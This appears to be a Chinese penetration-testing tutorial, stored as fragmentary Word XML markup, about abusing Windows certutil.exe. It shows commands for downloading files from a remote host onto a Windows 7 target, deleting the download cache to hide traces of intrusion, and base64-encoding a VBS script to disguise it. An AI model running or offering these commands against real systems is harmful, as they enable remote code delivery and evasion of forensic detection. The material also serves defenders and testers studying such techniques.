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4.600pt;margin-top:348.600pt;width:467.400pt;height:242.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:630.600pt;width:423.600pt;height:71.40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8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>certutil微软官方是这样对它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>解释的：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53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Certutil.exe是一个命令行程序，作为证书服务的一部分安装。您可以使用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Certutil.exe转储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和显示证书颁发机构（CA）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配置信息，配置证书服务，备份和还原CA组件以及验证证书，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密钥对和证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>书链。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>url:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>ocs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-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3783"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>server-2012-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>R2-and-2012/cc732443(v=ws.11)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但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是近些年好像被玩坏了。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靶机：windows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7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certutil.exe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-urlcache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-split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3783"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>http://192.168.1.115/robots.txt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4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默认下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>载为bin文件。但是不影响在命令行下使用。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cer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tutil.exe下载有个弊端，它的每一次下载都有留有缓存，而导致留下入侵痕迹，所以每次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下载后，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需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>马上执行如下：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certutil.exe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-urlcache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-split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http://192.168.1.115/robots.txt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delete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61.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:192.600pt;width:409.800pt;height:68.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:279.600pt;width:342.600pt;height:60.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:400.800pt;width:375.600pt;height:65.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId12" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:526.799pt;width:467.400pt;height:135.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:702.600pt;width:353.399pt;height:69.599pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId1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而在应急中certutil也是常用工具之一，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来对比文件hash，来判断疑似文件。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52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="26"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2003：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3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51"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="35"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7：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1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>certu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>til的其它高级应用：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C:\&gt;certutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-3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-encode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-3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c:\downfile.vbs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downfile.bat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2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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file:dow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nfile.bat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3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解密：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396.0pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:90.599pt;width:467.400pt;height:151.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16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7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file:downfile.t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-16"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xt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8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328" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>后者的话：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powershell内存加载配合certutil解密是一件非常有趣的事情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。会在未来的系列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中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>讲述。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1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